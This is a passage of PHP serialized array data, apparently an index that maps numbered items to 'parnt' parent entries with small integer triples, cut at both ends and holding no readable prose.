i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:175;i:1;i:0;i:2;i:1;}}}i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:230;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:231;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:232;a:4:{i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:180;i:1;i:0;i:2;i:1;}}}}i:233;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:234;a:3:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:181;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:182;i:1;i:0;i:2;i:1;}}}}i:235;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:183;i:1;i:0;i:2;i:1;}}}}i:236;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:184;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:185;i:1;i:0;i:2;i:1;}}}}i:237;a:3:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:238;a:2:{i:13;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:186;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:187;i:1;i:0;i:2;i:2;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:239;a:3:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:240;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:241;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:242;a:17:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:171;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:172;i:1;i:0;i:2;i:1;}}}}i:243;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}}i:244;a:6:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:80;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:82;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:83;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:84;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:85;i:1;i:0;i:2;i:3;}}}}i:245;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}}i:246;a:1:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}}i:247;a:1:{i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:248;a:2:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:249;a:1:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:250;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:251;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:252;a:3:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}}i:253;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:254;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:255;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:43;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:190;i:1;i:0;i:2;i:1;}}}}i:256;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:44;i:1;i:0;i:2;i:1;}}}}i:257;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:258;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:259;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:260;a:4:{i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:51;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:191;i:1;i:0;i:2;i:1;}}}}i:261;a:1:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:262;a:10:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:164;i:1;i:0;i:2;i:1;}}}i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:56;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:192;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:193;i:1;i:0;i:2;i:1;}}}i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:263;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:264;a:1:{i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:56;i:1;i:0;i:2;i:1;}}}}i:265;a:4:{i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:27;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:266;a:1:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:62;i:1;i:0;i:2;i:1;}}}}i:267;a:1:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:63;i:1;i:0;i:2;i:1;}}}}i:268;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:269;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:270;a:2:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:271;a:1:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:1;i:2;i:1;}}}}i:272;a:5:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:273;a:10:{i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:194;i:1;i:0;i:2;i:1;}}}i:30;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:195;i:1;i:0;i:2;i:1;}}}i:31;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:196;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:274;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:275;a:13:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:179;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:193;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:276;a:1:{i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:198;i:1;i:0;i:2;i:1;}}}}i:277;a:2:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:278;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}}i:279;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:280;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:281;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:282;a:7:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:283;a:1:{i:73;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:199;i:1;i:0;i:2;i:1;}}}}i:284;a:1:{i:73;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:49;i:1;i:0;i:2;i:1;}}}}i:285;a:1:{i:73;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:200;i:1;i:0;i:2;i:1;}}}}i:286;a:1:{i:73;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:201;i:1;i:0;i:2;i:1;}}}}i:287;a:1:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:288;a:2:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:289;a:2:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:290;a:6:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:202;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}}i:291;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:203;i:1;i:0;i:2;i:1;}}}}i:292;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:55;i:1;i:0;i:2;i:1;}}}}i:293;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:294;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:204;i:1;i:0;i:2;i:1;}}}}i:295;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:110;i:1;i:0;i:2;i:1;}}}}i:296;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:178;i:1;i:0;i:2;i:1;}}}}i:297;a:1:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:298;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:181;i:1;i:0;i:2;i:1;}}}}i:299;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}}i:300;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:181;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:301;a:4:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:171;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:302;a:21:{i:49;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:16;i:1;i:0;i:2;i:2;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:160;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:30;i:1;i:0;i:2;i:2;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:76;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:303;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:304;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:173;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:206;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:207;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:208;i:1;i:0;i:2;i:3;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:209;i:1;i:0;i:2;i:1;}}}}i:305;a:8:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:210;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:210;i:1;i:0;i:2;i:1;}}}